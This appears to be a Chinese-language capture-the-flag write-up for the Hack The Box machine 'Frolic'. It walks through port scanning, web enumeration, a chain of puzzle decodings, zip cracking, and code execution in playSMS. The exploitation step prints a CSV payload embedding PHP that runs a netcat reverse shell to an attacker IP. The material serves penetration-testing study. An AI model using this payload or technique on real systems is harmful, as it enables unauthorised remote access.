hackthebox - frolic （考点: 信息搜集 ook解密 base解密 zip 解密 xxd解密 brainfuck解密 playsms安全）

1 扫描

22想到可能有ssh登录，139 445想到smb利用，web开在了9999进去搜集信息

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
|   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
|_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
9999/tcp open  http        nginx 1.10.3 (Ubuntu)

但是smb进不去，只有突破web了

2 web信息搜集

dirbuster扫，我勾了recursive扫子目录，虽然工程量变大，速度会变慢。但毕竟就web这个突破口，扫描更详细些好。边扫边看别的信息。

看到有登录框，输入几次自动锁死，SQL注入无效，猜弱口令也进不去。
backup里有密码和用户文件，但是这密码没用。

还看到了admin/js,虽然点不开，但是提醒了我这个前端登录框有自动锁死效果，应该是用js写的，
ctrl+u 查看前端源码有没有js，点开登录的js，倒有密码信息了。登录，成功。

3 各种解密

进去后，是一堆标点符号密码Ook，网站解https://www.splitbrain.org/_static/ook/ 点击Ook to text

提示新目录，进去后又是base码，解密但是一堆乱码，这个说明加密的不是一段话，而是应该是把什么文件给加密了。应该反解密成文件形式。

我的kali用base64解码总是报错。网上搜解决办法，最后-d后加-i才正常。
发现是个zip文件，打开要密码

C:\root\htb\fronlic> echo "UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA" | base64 -d -i > what
C:\root\htb\fronlic> file what
what: Zip archive data, at least v2.0 to extract
C:\root\htb\fronlic> mv what what.zip

继续解密zipfcrackzip what.zip -u -D -p /usr/share/wordlists/rockyou.txt

C:\root\htb\fronlic> fcrackzip what.zip -u -D -p /usr/share/wordlists/rockyou.txtPASSWORD FOUND!!!!: pw == password
C:\root\htb\fronlic>

打开后又是一串密密麻麻的数字,这种数字型密码，应该是hex，拿xxd解。。

C:\root\htb\fronlic> cat index.php | xxd -r -p
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==
C:\root\htb\fronlic>

解出是base64，再解这个base，出现brainfuck这种符号格式密码，继续在这个网站https://www.splitbrain.org/_static/ook/解，点brainfuck to text

OK了。应该是密码idkwhatispass，但是不知道登录啥。

回头看一直在扫的dirbuster，dev里还有东西，点开看写着/playsms。

进入10.10.10.111:9999//playsms输入admin + 密码，搞定。

4 playsms拿shell

有固定的方法，在myaccount - phonebook - import 上传csv文件，

如下，自己做个csv文件。加上弹shell代码

Name,Mobile,Email
<?php echo system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.43 443 >/tmp/f") ?>,66,22

收到shell搞定

5 linux缓冲区溢出

老套路linpeas自动扫https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
suid赋予文件root权，发现个不常见的文件rop，这应该就是提权突破口了。

检测是缓冲区溢出，但算了，超纲了oscp的，且考试似乎只考win，暂时放下，等学有余力再研究吧。